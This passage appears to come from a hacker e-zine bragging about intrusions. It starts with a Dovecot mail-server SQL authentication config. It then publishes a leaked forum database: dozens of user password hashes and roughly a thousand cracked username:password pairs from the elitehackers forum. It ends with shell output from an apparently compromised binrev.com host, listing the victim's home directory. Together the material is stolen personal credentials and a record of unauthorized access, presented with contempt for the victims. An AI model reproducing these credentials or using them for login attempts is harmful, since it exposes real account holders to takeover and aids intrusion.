#   For available options, see the PostgreSQL documention for the
#   PQconnectdb function of libpq.
#
# mysql:
#   Basic options emulate PostgreSQL option names:
#     host, port, user, password, dbname
#
#   But also adds some new settings:
#     client_flags	  - See MySQL manual
#     ssl_ca, ssl_ca_path - Set either one or both to enable SSL
#     ssl_cert, ssl_key   - For sending client-side certificates to server
#     ssl_cipher	  - Set minimum allowed cipher security (default: HIGH)
#
#   You can connect to UNIX sockets by using host:
host=/var/run/mysqld/mysqld.sock
#   Note that currently you can't use spaces in parameters.
#
# sqlite:
#   The path to the database file.
#
# Examples:
#   connect = host=192.168.1.1 dbname=users
#   connect = host=sql.example.com dbname=virtual user=virtual password=blarg
#   connect = /etc/dovecot/authdb.sqlite
#
#connect = dbname=virtual user=virtual

# Default password scheme.
#
# List of supported schemes is in
# http://wiki.dovecot.org/Authentication/PasswordSchemes
#
default_pass_scheme = MD5

# Query to retrieve the password.
#
# This query must return only one row with "user" and "password" columns.
# The query can also return other fields which have a special meaning, see
# http://wiki.dovecot.org/PasswordDatabase/ExtraFields
#
# The "user" column is needed to make sure the username gets used with exactly
# the same casing as it's in the database. Note that if you store username and
# domain in separate fields, you most likely want to return a combination of
# them as the "user" column, otherwise the domain gets stripped.
#
# Commonly used available substitutions (see
# http://wiki.dovecot.org/Variables for full list):
#   %u = entire userid
#   %n = user part of user@domain
#   %d = domain part of user@domain
#
# Note that these can be used only as input to SQL query. If the query outputs
# any of these substitutions, they're not touched. Otherwise it would be
# difficult to have eg. usernames containing '%' characters.
#
# Example:
#   password_query = SELECT password FROM users WHERE userid = '%n' AND domain
= '%d'
#   password_query = SELECT pw AS password FROM users WHERE userid = '%u' AND
active = 'Y'
#
#password_query = SELECT userid as user, password FROM users WHERE userid =
'%u'

# Query to retrieve the user information.
#
# The query must return only one row. Commonly returned columns are:
#   uid - System UID
#   gid - System GID
#   home - Home directory
#   mail - Mail location
#
# Either home or mail is required. uid and gid are required. If more than one
# row is returned or there are missing fields, the login will fail. For a list
# of all fields that can be returned, see
# http://wiki.dovecot.org/UserDatabase/ExtraFields
#
# Examples
#   user_query = SELECT home, uid, gid FROM users WHERE userid = '%n' AND
domain = '%d'
#   user_query = SELECT dir AS home, user AS uid, group AS gid FROM users where
userid = '%u'
#   user_query = SELECT home, 501 AS uid, 501 AS gid FROM users WHERE userid =
'%u'
#
#user_query = SELECT home, uid, gid FROM users WHERE userid = '%u'

# If you wish to avoid two SQL lookups (passdb + userdb), you can use
# userdb prefetch instead of userdb sql in dovecot.conf. In that case you'll
# also have to return userdb fields in password_query prefixed with "userdb_"
# string. For example:
#password_query = SELECT userid as user, password, home as userdb_home, uid as
userdb_uid, gid as userdb_gid FROM users WHERE userid = '%u'
user_query = SELECT CONCAT('/var/vmail/', maildir) AS home, 8 AS uid, 12 AS
gid, CONCAT('maildir:storage=', quota) AS quota FROM mailbox WHERE username =
'%u' AND active = 1
password_query = SELECT CONCAT('/var/vmail/', maildir) AS userdb_home, 8 as
userdb_uid, 12 as userdb_gid, username as user, password,
CONCAT('maildir:storage=', quota) AS quota FROM mailbox WHERE username = '%u'
AND active = 1


Elitehackers also wins the "Most hashes cracked" award beating the previous 
champion blackcode.com. They accomplished this despite the fact that we have
a legendary backlog of hashes to crack.

Have some mod hashes and some random hashes.

KraziKlown:$PHPS$526e38$ac11a069bdb7cd833eaee099fc34c1db
napta2k:$PHPS$3b3b40$6352b9e9c5d7d85bf8b98e5c7d98b3db
Chonk:$PHPS$533742$dee75194d6fcf66a9613ad63f54e574f
dbones:$PHPS$6d364b$444adf5c169b087dbb493d2df81483f5
Demon:$PHPS$305f37$820c9648d658cf215152371bfd8eb906
Glycol:$PHPS$6b2100$480ccccbf2d98b15b4323ebfcc54a1c7
Grog:$PHPS$454e67$30c35014e22f2dd362a765267180feba
Iron_Cross:$PHPS$3b4f61$4c6a17bb640614cd57eac7749d59135b
KAOS:$PHPS$462142$99aaea0e77747fceabf98f47197a5c73
Ushi:$PHPS$2a7a3f$7e643d021da1c84ae390c56e7ebc7d98
firewall_bypass:$PHPS$6d0000$56124ef6e8a082e78db61acbeb92c03a
B1nary:$PHPS$47572b$eec4f1b8619d9b26b1ed4c852dc094b6
NightWolf:$PHPS$616164$e9ccbe4a3e5adc1009b38ff05c58f058
G-Brain:$PHPS$353500$01b8c54c1e48cdb73caa2736961d62b8
psycho:$PHPS$613172$117aac030ba2a5f14e0e26da000acf16
Psycho:$PHPS$7a4255$d63bdd12de9db446b906d36587cc692e
Sycho:$PHPS$5a403b$e3d7c033921ec69d5c3566492717c330
psycho:$PHPS$216b69$5ae3dec8044b0013903e4eb6ff4a6199
Maxspeed:$PHPS$693662$92e73b888389c5ece659127ca6cfcbcf
MorningStar:$PHPS$4e657c$b220864f610c45f024374d5bb98263ba
hackinghamster:$PHPS$644b30$7f87b03893238bcb5b891c4d5e6f0ec5
Hamster:$PHPS$2d2759$145961e4f4d1202c62878f0c5aab311a
User:$PHPS$71445f$f96c4b2c088a20866c938d1c79da17d0
BadBoyThePrince:$PHPS$6f5176$0e30c6e137bfef486be920653a53e46b
nekolord:$PHPS$3d4b37$d665b4de93b43d003621bc3667abb0bd
Scrapheap:$PHPS$297026$5f4c91c77fa26a89ff5e4b58e9202893
SPAZ:$PHPS$3d672c$aef6a398576f7c66d52a8a26eebb8c7a
Finman:$PHPS$404231$547eba0337cc4890460060ab3d94aba0
unknown_usr:$PHPS$6b3764$7fd37eab6ec0c6c58aa35cac5e5a8839
sunjester:$PHPS$3b412d$9f6355b3d494d98e14b100e9cdecd0a2

And the ones we cracked...

warezcollector:Paulan1
rmmx:1qaz
doomz:killer1
mind80:ast
the_viPer:trottel
nodrog21:maggie1
penguin:coffman
_1337_Newbie_:z3r0
jediwes:corsair
Demon:09221961
B1nary:59104070
psycho:spug
Psycho:bobby
psycho:02021983
Maxspeed:windows
MorningStar:tobias
Hamster:sk84u
BadBoyThePrince:asasas
nekolord:novascotia
sunjester:34684342

11 password hashes cracked, 19 left


In total...

10479 password hashes cracked, 13523 left

For the fun of it, here's 1000 of them.

warezcollector:Paulan1
rmmx:1qaz
doomz:killer1
mind80:ast
the_viPer:trottel
nodrog21:maggie1
penguin:coffman
_1337_Newbie_:z3r0
jediwes:corsair
dharmabum06:bodhisattva
M45T0R:2222
frito91:homes
Warrior:whizzkids
Goldtassel:cricket
rukidingme:talamar
renegade2003:deadman
bugsfix:bugsfix
suicemibit:camaro
millian:voodoo
SatMedic:123456
Boy:robert
CrAzYmAn370:HUNTER
karnautrahl:katrina
1:eat
Psx_j2:sony
malfunktion:yoyo
boy:taboo1
Interex:presario
coras:genesis
ivj3pa:ivanaj
kmp:kmp80
RaDeoN:05071984
d0p3:nikita
ninja_54:895623
douggiestyle:sabina
bd9:ditu
python:alpha
Soul_Chaser:dragons
Masteroflife:jamesbond
Maxspeed:windows
IGNITE:password
jamieharrop14:thailand
BIG_THREAT:s3cr3t
jo:webcam1
b1lly:openit
TheKingOfMice:underdog
crusader:tribute
Alchemist:front242
Klown:insane
mark:hubert
crazy8:6148
commander:0502
newbie:brazil
hoowzer:honor
Elvoret:123456
Virus:dragonfly
EvilBuffer:qwerty23
expedition:xtc
Rhyno:gyros
_Sylent.X:007
Hejvan:coushin
maddoorsfan:julie
MysTiCalGohAn:dbzdbz
darth1968:candy
arnold:rannug
NaTaS:satan
Iorekr:diablo
Aseren_:whatever1
Red:hello
cutejai:auscam
-bNlitz-:drsmith
TeZ:485112
CSAssassin2:bean21
Risto:mathers
tg0m:monkey
twiggy110:trustno1
djmcjinx:99999
Tzu:hi
guitaro:deville
Darius:zilch
Inc.:sebastian
Recondo:schumacher
THEDUCK506:1q2w3e
Fallen_angel_831:fallenangel
mack_ol:nbb
troubles:troubles
philipw:auckland
Insane:archdevils
CodeTracker:codetracker
NytesEyes:ireland
Bellix:bellix
marcs_fallen_angel:Godsent
kaizersosae:kaizers
gbosy:123456
luca:testtest
1.0:fish
Willoc:revilo
Jakex:greenday
CEKTOR:lanparty
Sethik:awed
w8n4afreak:eu86t
gbmaster:diglet
786:raza
coold8956:coold
nuccom:radioactive
darkdashing:hello
whitwulf:albino
Quicksilver:hugo
napster666:wetwilly
MatriX_jr:alisha
timmieboy88:lemmein
cynergy:diablo
Foxman:foxman
x:louise
Hyp3ri0N:kookies
badaxxe:davy
Josmul123:fuzzball
Rax:dick
CrazyDrummer15:64897
MASTER:12345678
jaybee:jaybee
Incideus:change
lopez:lopez
pretty_fuck:thomas
xaero:gamma
Prowler:prowler
kinky-kroon:warzone
AtomSoft:jasonl
Freak:phreek
BoB:sanderson
PhAtE:phate
Trickster:shadow
scarsofvelvet:11111111
STICK:reaver
kyle2227:2227
InHuman:hawley
bLaCkHaNd:rascal
vertigochild:whatever
Vinyl:phoenix
viperdqn:nenga
KingOfKingZ:123456
Kindred:cobra
Toufa:ty98
BLaHRiP:none
thtswhereyawrong:asinat
zwhomes:bandit
FATAL-1:izzy
Raiden:Digital
Sandy:dingle
amirman2099:shortcut
Guardian:locks
FEAR:piff
iceflash:123456
kukyfrope:grassroots
imdonly1:password
Psyon:iforgot
McGuinness:hanging
drkchld:1782
arch17c7:matrix
Makaveli:birchard
althea105:althea
miamiboy:123456
ROZE:roze
cobra48:zxcvbnm
roberto:romece
Gr8Lori:gloria
Hunt:bottle
cupido2:hello
XXKodiaKHackeRX:radio7
Meep:cool
Raines:Redwings
lalakis:123456
Moco:vt
EliteTwats:wankers
hellspawn:doggys
drblackjack21:sunflower
Nirvana:glasaal
chrisf:badass
athlon800:jasper
Chance:822822
ColdY:green
ForbiddenTouch:lexmark
violentone666:acef
Loaded:kamari
cheshirecat:eyes
Cruach:evil1
nonsense:satire
bobbybob:123456
T:darkdog
L1nk:instinct
cszwed:cszwed
Error:reddragon
Ashnak:willie
Escobar:limpbizkit
Redwater:crapper
Smight:toad
tiger:freedom1
da_killer:avatar
Soldier:midgar
Whoremoans:bobby
SnowCrash:password
Invisibl3:david1
Mega-Hawk:123456
Starrman:deejay
nullz0r:magic1
duke:1984
fuguz:fuguz
invalidsource:sourcecode
ALLAN:fatboy
Scorpions:Scorpions72
REmixER:poiuytrewq
BlAcKhAcK:lightning
Idiot:idiot
dathuilfia:fireman
FyrFytr44:114182
Warrior:relena
Hilick:Roland
Nemo2002:nautilus
Phan:frasse
Half-Guy:1
acadril:mike
CowboyBebop:CowboyBebop
j0ker:hacking
yoyoyo:yo
SYN:poiuytre
trekiejon:486570
SecureBreach:122782
Creep:therock
Crasher:0411
Squam:sublime
magickone:etherton
thatguyyoudontknow:anonymous
michan:yumes
fossymike:hilda
kippetje:joris
G3n0cid3:talon6
stupidfool:tippy
tumor:andrea
da_vato:lowlow
garfy:slovenia
jwufme:shibboleth
Ghost:Caspar
Girl:number1
bonytony:170120
killer64:password
notting0:happiness
The_Rorschach:Fugazi
anzac:wildcard
Okt:2000
holmes:TROY
Dudley:letmein
ZodGilla:phunky
afrodziak:brenda
gemma_2oo3:robbie
Skipaco:paradise
gamefreak:rawiswar
LotustVH:120973
spyder299:1spyder
Sharona:miriam
Daelanus:tartarus
kernelpanic:sofie
cod-e:sandman
glasyalabolas:moltar
fungivore:spyderco
Freeman:sithlord
pc_anyone:draziw
funkadl:1234
maxwel:master
zedopipo:123456
mamma555:mamma
jjunited7:becks
Goloubev:maria
Guarddog:1568
eGoTTi:crystalscan
dflw55:55dflw
deepsouth:811820
utumkodur:moloch
Marius_Vryce:michelle
canytellu:motocross
zsigger:jojojo
Hart's:flywheel
bmw222000:goldfish
McBane:oralia
KbudE:q1w2e3
Erestar:reimann
Freon444:crap
eroican:eroica
Thrillz:12345
dragon:windwalker
Graphics:random
dummy:lenong
Brett19:diablo
brother:broman
sharkfood:9770
RazorChrist:affinity
Incognito1:pantera6
Z:boll
Hanibal:Hanibal
ReaLOnEE:password
Lane:cimbom
explorer:thatisit
[xaos]:hitman
blight:ninnin
killer:24
liquidloop:nothing
LiVeViRuS:gateway
rEjeCT:pana
Dennis_the_menace:Millenium
kruzty:crappo
hurleykid1:passport
firox_uk:predator
kuma11:tricia
BigPete:asskicker
Anblick:itisme
benbob:benbob
silka1234:bimbo1
sirhcv:perfect
RageUO:jericho
Panzer99:telephone
Marshall:password
Zer0_Co0l:71380
driver2:1
PROTON:PROTON
JeLlYfIsH:jessica
psycho:spug
nuke:pierre
Striker:lilian1
Newb460:sekhmet
ramiro:74123
austin:cow
cybercrack:Cyber
Iain:password
CommandoCW10:123ccc
kevdog777:michael
tvguy:money
muffpuppet:looga
RoadKill:2122
ICaRuS:qqw
spinyebo:fuckyoutoo
CyberTooth:passport
saraiva:062
KeithN:manutd
Spike:n0ne
Tolerance:powers
Brian:jollyrogers
omenator:edwards
microsoft_kpo:25101986
pornovis:xyz
Sarah:enigma
Toni:butterfly
lunatic:estelle
King:reliable
Sin:guy
xplorer3:mitabrev
Jr.:passport
tdub:twf
cro)Defiler:kima
Mantle2600:tribe
jayman:164810
yuchume2:peewee
ravenowl:3425283
ShaneOmacK:therock
neontrain:neontrain
molusc:winnie
fear:fear
Cyndrax:redalert
Meat:oliver
sExY:hehehe
pchillman:lancaster
KAS:THEROCK
drewdonc:raytel
Tell:caramba
Vashen:elite
raptor_ri:raptor17
2003paul182003:brambles
Slayer:wildman
CZ-Nero:helena
hypur:Qwerty
Mindhax0r:adolf
peterla:peterla
Daddy:shit
Grynn:grynn
Hunbig:cc
Swodi:122386
Untouched:jamesbond
Gigglepants:trustno1
Satanist-imam:123123
Edud:qazwsx
r0gu3:qwaszx
Day:faith
SuperSeeper:111222
dicko:drdre
joker1war:buster
Analkosmetik:666666
wcarlzzon:1977
ganymed2:thomas
phreak:abc123
]{AbOom!:nono
quantity:semperfi
Erikswe:warez
Soldado:gustavo
Zincaito:typhoon
TheTess:23
Lasher:blue
Appie:heineken
angry_platypus:12345
spicy:786110
Studly:xwings
Thunderbolt:dalgas
dewweydawg:handle
WilsonTheVolleyball:kenner
225:29385098
fsop:william
Tamerlane:lemon
CouldBeTRiPP:beebop
Bitterwoo:bitterwoo
leeya:randhir
bingobongo:andyb
VBNoob:437782
frog22:hop
sano:philly
Aceman:aceman
i.c.e.m.a.n:computer
Beast:letmein
Cypher:220587
terblo:terblo
bhomie:steven
Jeeto:jimboy
eagel:tusse
Sarge:fairmont
itreality:9177
railforreal:qazwsxedc
Man:dantheman
Holmes:amirman
InfinityO:123456
SquirrelBoy:usagi
rpg2001:pierre
mind:mind
dssgorila:windows
hacker:987654321
Cool:Trisha
newbiehacker:159951
Mr_BigTime:ninja
blkburn:waterloo
Byte:piff
kaosprince:kitten
fabchat:fabrizio
Mind:pillow
Hawk:krap
dan:wild
superturbo:800070
darth_maul_destroyer:lightsabre
skar23:skar23
t0lik:moscow
ZeRo:freedom
Onion:love
Snoop:baseball
HappyFroggy:happy
K_Dogg:thedog
dumbsmurf:jstevens
Goop:Goop
DraganX:buster
atmosphere:google
nikpao:george
Danish-Newbie:anders
sonu:taju
The_Burning:adam04
google:abc123
clarenceworley:nexus6
Sc00b_E:ginger
jfgould:1547
stalepea:hatred
RJ:schiess
Covet:death
gufrey:carter
arat_thegreat:2353535
neo15:union
Man_Eating_Cow:password
freeb0rn:greece
sandplasma:marisol
simpson:187187
VidKid:gibson
Louder00:dartagnan
Osiris:jester
flyer13:hmb
throbber:abide
antiposer:261127
BlackGem:abcda
ToKeMoN:eminem
FuckinMS:trinitron
Eiskalt:blubb
phreaK358:blowme
Stolenhorse:moviestar
Apach:budale
KevGymnast:rapture
schoki:14807
Copycat:seymour
Papineau1837:clark
walter:pharma
Brodog:nihongo
WaNg_535:lasher
leafit:284812
the-space-cowboy:acheron
rockforlight:zapatista
Scorpion636:12345
Droogie:nilsson
slysoft:898989
masterhacker:jhi
G0dz0rs:brian
dimension:dimension
pependejo:pepon
mr.blond:666666
Lov2xLR8:rockstar
OverClocked:password
Cristy:1340lu
death_metal:1488
II0II0II:123456
Infyrno:cstrike
Virus:valentine
sossa:lulop
hknightmare:hockey
GoKarter44:champ
Guybrush:LarsLars
catwoman248:kitty
jittles:nermy
NICkY:claudius
yeahbaby:brooklyn
lordeclipse:thunder
Herro:frogfrog
pistol:eminem
JohnnyRebel:anfernee
johnross:090284
JoTuN:clent
Damascus:blueberries
Dr4k3:314159
Name*:redbull
AJ:shiatsu
Tricia:tricia44
shank:password
pcr:pppp
ttelite:elite
jupdyke:112358
hunter:hunter
Duck:duck
Fiend:simple
ALLURE:SAMUEL
Seven:sambuca
CSAssassin:bean21
xyi:hardcore
Eaglescott:eaglescout
Marley:menace
ineedhelp:123456
T0rn:sadbuttrue
Kate:kate
St1nkF1nger:lemmein
greggles:Sambrook
lastchance:robert
sane:sane
numb:12345
Darkelf30:4462
compman69:123456
DslLmi:turbo
L.D.50:frederik
chuckie:523470
kaio2k2:12345678
Cor:2132
Ikon:pana
JadeDragon:holly
turby:doritos
child:tigger
void:override
Man:single1
Jebus:cambridge
aussieron:pussy
silentsharp:ZZZZZ
extasy1:xuser
cks_cropper:challenger
Tony:abc123
ic0n:suckit
BBW:Annemarie
alien3210:mommy
ZEROCOOLWANNABE:owell
Huron:rambo
klitwoman:123456
l33thacker:aaaaaa
Zigmund:gandalf
LicKer:killer
Nobody:blahblah
gripweed:bodhisattva
GeTaFiX:asterix
Skulls-Ettin:rain
WeMiC:beebop
xstml:alpha
asfopoo:same
4ssassin:31337
winhex:winhex
a9572:turky
Holst:hackhack
robinhood:canada
purplewarlock:makeitso
Duritz:TULLE
Skitz0FrAntIC:shit
marcelo_melo:melo1977
inneedofporfesionalhelp:hacker
zag:ccsf
rolonrolon:nightnight
Banzai18:banzai
Peace:guitar
canwin:wantto
satanbaby:superman
Soldier:seifer
ltlMonster:jaws
DaveVato:butthead
KyLe:tuesday
Barrakketh:183461
Jimathy:surfing
JenDoc:jenn
nirav:password
Gremmie:180155
YeahMeToo:metoo
KnuckL3Z:cafer
LongBeach4Life:surfer22
jestreb:kompas
Thor:kingking
gnomie007:nedkelly
Lo-Key:anarchy1
Cinus:goldberg
Miami_Man:felix
unregistered:unregistered
dime:helpme
Austin3600:get316
raja:rani
abe8810:athlon
Smokez:0000
No_Hack_Guy:moose
hephus:joe
jester5386:homerjay
Asina:shit
wallawallawashington:peace
escadron:kewin
illusive:thend
ARMYBOY69:qwerty
e-shark:485112
AntiQser:zxcvbnm
wyclef182:zzzzzz
greek2001:nikolas
projectkmo:drevil
brain:crepitus
dilhole:brittany
whiterabbit:champion
Szpaner:diablo2
Squirrel:pomme
slackerhacker00:spongebob
lillkocken:music
TT:jujai
Sighbernaut:poser
Bird:fuckyou
cachas70:caliente
regbomber:123789
Vision:alpha1
michel45:roberto
bleh:give
hbk:therock1
Bubbe:Berliner
halfabox:ladybug
mrcarp:rayann
CcHakNjaKcC:120981
dvinds:nobody
KaiserWizard:john
bertje:bertje
PurpleWeenie:Dragon
Registered:frogfrog
billy_the_kid:112233
snipeman:147896
beej:register
eyesolus:innovision
topdiggy2:pimpin
vhvn:newnew
GamblorX:blitz
Neptune:TRITON
tester101:linux
assilem:diablo
Tropez:1134
ciced:smith
nightrider_00:alpha
killed-by-firewall:zahra
PlaYaZ:blowme
sephirothzero00:element
RickMasters:s1mpl3
RADAR:radar
bcvfd2:cows
spider-man:rachel
cuz:burt
classified69:whore
landshark:fish
mark34:yellow
taz:samuel
Amichan:moon
madmartigan:1313
Mojophobiac:Centauri
~??????_V?L?????~:maxell
EnsignE:qazwsx
Atlantis:blue
atlasshrugged:fart
Ozzman:ozzy
newbie1011111:xxxxxxxx
dreadblaze:continuim
BURN:24911
shantzy:25802580
ggordon:mmoshi
LuNaTiCPropheT:halflife
Riz:kut
shackyman01:2040
wonderbreadjn:scooby
Vasquez:smigul
GreyWolf:playstation
effix:nevernever
marci:master
airic:koalabear
goldfingermafia:bibbob
iambobmarley:marley
sdsg_85:2cool4u
lockon:shearer9
Blade:hacker
EvilDrKimble:101183
Trick:plat
legibleskate:rentrap
hbk1982:lionking4
Gill:pilgrim
Eclipse:elitist
Dubworth:Hotties
Sniper:movies
Burr:poop
SniperG:melody
david:oquendo
myne_h:b16a1
jjnxs:peaches
Killed:kyle11
fata1ist:sony
Maleioch:kirin
Eidolon:vette1
Urthrun:bonzie
asd159263:decent
phantomzz:menace
Psytrix:crashand
Tizio:cacca
kuba:pgpgpg
Bananamouse:spikerip
exhale:gator
2JR:buba
all:123456
NTidd:rapalA
JBKlyde:smokey
Rapture:idontknow
hugo-yurway:elegance
sinseray:breanna
RCV:burritos
joebananas:busto
j0nD0:PRIMITIVE
Shedim:dark
Zikterion:2203
X-Factor:three
RandomIdiocy:stuffies
God:sword
NooBie:qwertyuiop
ZeroVince:nadia
Z?K??N:beta
visitani:asker
mr.sicko:mike
DarkMan:elite
Skullmaster:scooter
The-Tech:rainbow
gablag:lautrec
n00b:mystery
mcfly:wouter1
Metalz:pitbull
kalaharimonsoon:alpha
ikonyxs:music
mweed4:peebee
Maya_Spiritus:zerocool
thecows:fucker
xsquare:ravens
i_am_big_dave:hackers
clare1979:jeremy
ALIVE:187187
SassaFrazzz:sindy28
Balis:545937
rickterr:jericho
#1:123
jaymunee80:bathroom
kimberly:amireal1
ToxicAcid:gaming
Laura:n2deep
dragon7025:zxcvbnm
Ryan:default
chuckg:chazz1
KiNG:computer1
Cash^^:nn3
Compuwiz:stinky
warezwaldo:peace
DERS1:ders1
crazedmnk:chatter1
ThE_BoSS:2320111
jfar:qwerty
newbie2003:toshiba
keydriver:passwd
God:monkey
me:siberia
Silverwing:silverwing
ominus7:se7en
fandtm666:teacher1
cracker_the_hacker:ccccc
Xanax:ffffff
OVERRUN:exploit
CHUPACABRAS:11111111
unelitehacker316:parham
nex:squaresoft
Frog:jonah
GANT:CORNER
Damaged1:imzadi
Omega:qwertyui
Chairman:rainman
Paul19:Paul19
Gecko:mangie
eyeball:termite
G_kid:redwater
GBMN:michael
3nigma:ali
midnite23:1969
gogoguez2000:stumptown
spoz:navyseal
L1ThIuM:011386
westwoodpnefc:mowers
Sledge:aviation
LONGNLOOSE:019210
theWhizKid:chessino
Irc^Systmzz:022367
xthunderx:thunder
phat_matt01:mattp
rogeriko:naxos
gamer:adios
OldMan39:by8540
Asmodai:gangster
Ronin:slampa
CHAZ3R:wonder
Usus:courtney
Kimo:975384
atilla:airplane
UnknownHacker:biggame
Prime:freshmeat
De5ineAnnihilation:crystal
Epyon:gundam
DeadGirl:iloveyou
paul:1234
xavic:themaster
Cyres:Cyres
advinoki:33305
DA:butterfly1
Zmazha:girl
The_Master:corinna
beastineden:danny20
synthax:mushki
AtomiX:280472
red28200:lionheart
AnotherFruitcake:Melvin
narayan:nayaran
biggjames:shaft
otreus:uffaaa
Peepy:sinder
tumnus:ninja
Christ:dumbass
Dunceor:stefan
sabien69:disowned
Datafreak:security
master008:19840824
heinz2417:oldenberg
fixio:meathead
tedloon:cathy
tonykula:freddie
Reptevye:javert
OD-IceCLown:powell
WorshipTogetherWithGOD:mary
5t3v*:logjam
Carrera:Jonathan
ACE_WH1:cisco123
SAFAKA:MERT
bear_claw:bear
Sean111:wutang
cannabizman:weed
yesukai:paranoid
AbsoluteSaro:worthless
dfman:0009
jk3587:48469
neo2028:trustno1
chrisgage:12345678
Zeke420:chefchef
Otak:bailey
MadNav:mommom
ManOvaBoard:christophe1
HoboBrain:chilli
corbin:honda
SUSPICIONS:1QAZ
skyview:padraig
BradshaW:fuckoff
Newdog:newdog
Illumini:inimulli
Spook:00
[-X-]:bobos
andy:colleen
CrazymanSixty9:iamgod
icebrain:drowssap
Informer:tif
scobee:peterb
D'pro:truk
eric343:alien
Schmuckatelli:fantasy
shock:tyler2
X-Hacker:random
Symantek:1
evilsperm:angels
da_wunder:wunder
sparkafatty:072160
Ren:777
Nightsky:4402020
Phlame:kuffs
Lordxar:doom
Bikeboy:boston
tracker:1234566
RaMPaGe:lansing
Nemesis1386:027702
vampirexxi:gunshot
gordon:moshi
Mike18ca:baseball
KodeCypher:kodecypher
time43:12345
peach:inlove
OJ.SImpson:1134
BodyLotion:kameler
Akura:dragons
Flappity:dabomb
Realm:noway
randomhero:please
samurai491:slipknot
trellix:jon
Nanaki:cosmo
wizhead:crackers
Aeon:provost
rawnewdlz:rawnewdlz
Scorpion:fuckyou
Lazarus:rootbeer
Bean:huh
AnarchyInfection:741235
aSin:elf1
hacker2442:member
Jbull:jbull
networker:wallace
JackAss:kcampbell
newguy:cooldude
BURN3R:SAMSUNG
Kangol:dantheman
Rooster:enterprise
JackDonkey:monkey
Trance_Sniper:square
MT:61284
Newbee:newbee
Lochor:shaolin
Seabass:Bearfoot
cAt:sbbut
Beast:Tetris
FB007:temp
witchy:flames
xizd:8816
palmmjsg23:jennifer
DarkLord:shithead
daloa:7777
izznit:1izznit
coldrock:peach
MZGuy:350450
BuRnEr35:pennys
lyric:bible
rellikdruid:rellik
hackersoncrack:hightimes
ChanelONE:tikki
Laodiceans:pitagoras
rancid98:liquor
JahRasta:plop
*:seven
funshippete:carnival
ZeNkON:hak95
StormFury:12345678
Ian:ih
Phantomater:presario
gonzojournilist:shareef
goingplatinum:brooklyn
BestGuy:long
Bath:maria
supriya_kumar:password
X-sist:passport
AleZ:alexande
dude:1

As you can see, despite having a massive userlist we still cracked a lot of
them. This wasn't even a priority either, we had to limit our cracking of it
because of actual priority hashes.

EH is the new champion of the noob score, which if you recall from the last
zine is percent cracked times two. 100 * 2 * 10479 / (13523 + 10479) = 87. Very
impressive! Now there is really no reason to remember blackcode.

I just feel sorry for the people who spend so much time posting useless info on
forums like elitehackers just to rise to some kind of moderator rank. Get a
life.



                                           |
                                       \       /            _\/_
    Binary revolution                    .-'-.              //o\  _\/_
                                    --  /     \  --           |   /o\\
  ^^~^~^~^~^~^~^~^~~^~^~^~^~^~^~^~^~^~^-=======-~^~~^^~~^~^~^~|~~^~^|^~`
    But build to destroy                                            |
      You play with my world
        Like it's your little toy
          You put a gun in my hand
            And you hide from my eyes
              And you turn and run farther
                When the fast bullets fly.


Binrev.com is just one of those relic sites on the internet, such as blackcode
and elitehackers. They have no purpose, no skill and no point whatsoever to
existing. They milk the "Hacking" name for profit and ego boost. Such behaviour
is not to be tolerated, thus they felt the wrath of the almighty rm hammer.
What really pissed us off about these mentally challenged people was the
"hacking radio".

WARNING! Below you will see php code so retarded that might encourage you to
commit seppuku. You have been warned.

binrev@binrev.com [/home/binrev]# uname -a
Linux host.binrev.com 2.6.9-78.0.13.ELsmp #1 SMP Wed Jan 14 16:12:46 EST 2009
i686 i686 i386 GNU/Linux
binrev@binrev.com [/home/binrev]# id # pound? Did we accidentally drop root?
uid=32035(binrev) gid=32036(binrev) groups=32036(binrev)
context=root:system_r:unconfined_t
binrev@binrev.com [/home/binrev]# # :(
binrev@binrev.com [/home/binrev]# pwd
/home/binrev
binrev@binrev.com [/home/binrev]# ls -al
total 336
drwx--x--x  22 binrev binrev  4096 Jul 16 09:37 ./
drwx--x--x  41 root   root   12288 Jul    5 19:21 ../
drwx------   3 binrev binrev  4096 Jun 10  2007 .MirrorSearch/
drwx------   2 binrev binrev  4096 Apr 19  2007 .autorespond/
-rw-------   1 binrev binrev    52 Jul 16 09:37 .autorespond-loopprotect
-rw-------   1 binrev binrev  4959 Apr 26 01:34 .bash_history
-rw-r--r--   1 binrev binrev    24 Jan 27  2007 .bash_logout
-rw-r--r--   1 binrev binrev   191 Jan 27  2007 .bash_profile
-rw-r--r--   1 binrev binrev   124 Jan 27  2007 .bashrc
-rw-r--r--   1 binrev binrev  5619 Apr    5  2007 .canna
-rw-------   1 binrev binrev    23 Jan 27  2007 .contactemail
drwxr-xr-x   3 binrev binrev  4096 Aug 19  2007 .cpaddons/
drwxr-xr-x   5 binrev binrev  4096 Jun 28 14:49 .cpanel/
drwx------   2 binrev binrev  4096 Jun 10  2007 .cpcpan/
-rw-r--r--   1 binrev binrev    10 Jul 19 15:29 .dns
-rw-r--r--   1 binrev binrev   383 Jan 27  2007 .emacs
drwxr-xr-x   6 binrev binrev  4096 Jul 24  2007 .fantasticodata/
-rw-r--r--   1 binrev binrev    47 Jan 31  2007 .filter
-rw-------   1 binrev binrev    18 Jun 21 00:13 .ftpquota
drwxr-x---   5 binrev nobody  4096 May    9  2007 .htpasswds/
-rw-------   1 binrev binrev    13 Jul 14 10:35 .lastlogin
-rw-------   1 binrev binrev  2285 Sep 28  2008 .mysql_history
-rw-------   1 binrev binrev  1024 Aug 16  2007 .rnd
-rw-------   1 binrev binrev     0 Aug 16  2007 .securesslreqs
drwx------   2 binrev binrev  4096 Jul 19 15:26 .spamassassin/
drwx------   2 binrev binrev  4096 Apr    5  2007 .sqmaildata/
drwx------   2 binrev binrev  4096 Jul    5 19:21 .ssh/
drwx------   2 binrev binrev  4096 May    6  2007 .trash/
-rw-------   1 binrev binrev   657 Apr    7  2007 .viminfo
-rw-------   1 binrev binrev     0 Aug 16  2007 .xrampreqs
lrwxrwxrwx   1 binrev binrev    32 Aug 11  2007 access-logs ->
/usr/local/apache/domlogs/binrev/
drwxr-xr-x   4 binrev binrev  4096 Apr    5  2007 cpanel3-skel/
-rw-r-----   1 binrev binrev     1 Jul    5 17:36 cpbackup-exclude.conf
drwxr-x---  11 binrev mail    4096 May    9  2007 etc/
drwx------   2 binrev binrev  4096 Dec 28  2007 logs/
drwxrwx---  41 binrev binrev  4096 Jul 14 00:41 mail/
drwxr-xr-x   2 binrev binrev  4096 Apr    7  2007 nick84-temp/
drwxr-xr-x   3 binrev binrev  4096 May 10  2007 public_ftp/
drwxr-x---  33 binrev nobody  4096 Jul 14 10:37 public_html/
drwx------   4 binrev binrev  4096 Aug 16  2007 ssl/
drwxr-xr-x   7 binrev binrev  4096 Jun 28 14:49 tmp/
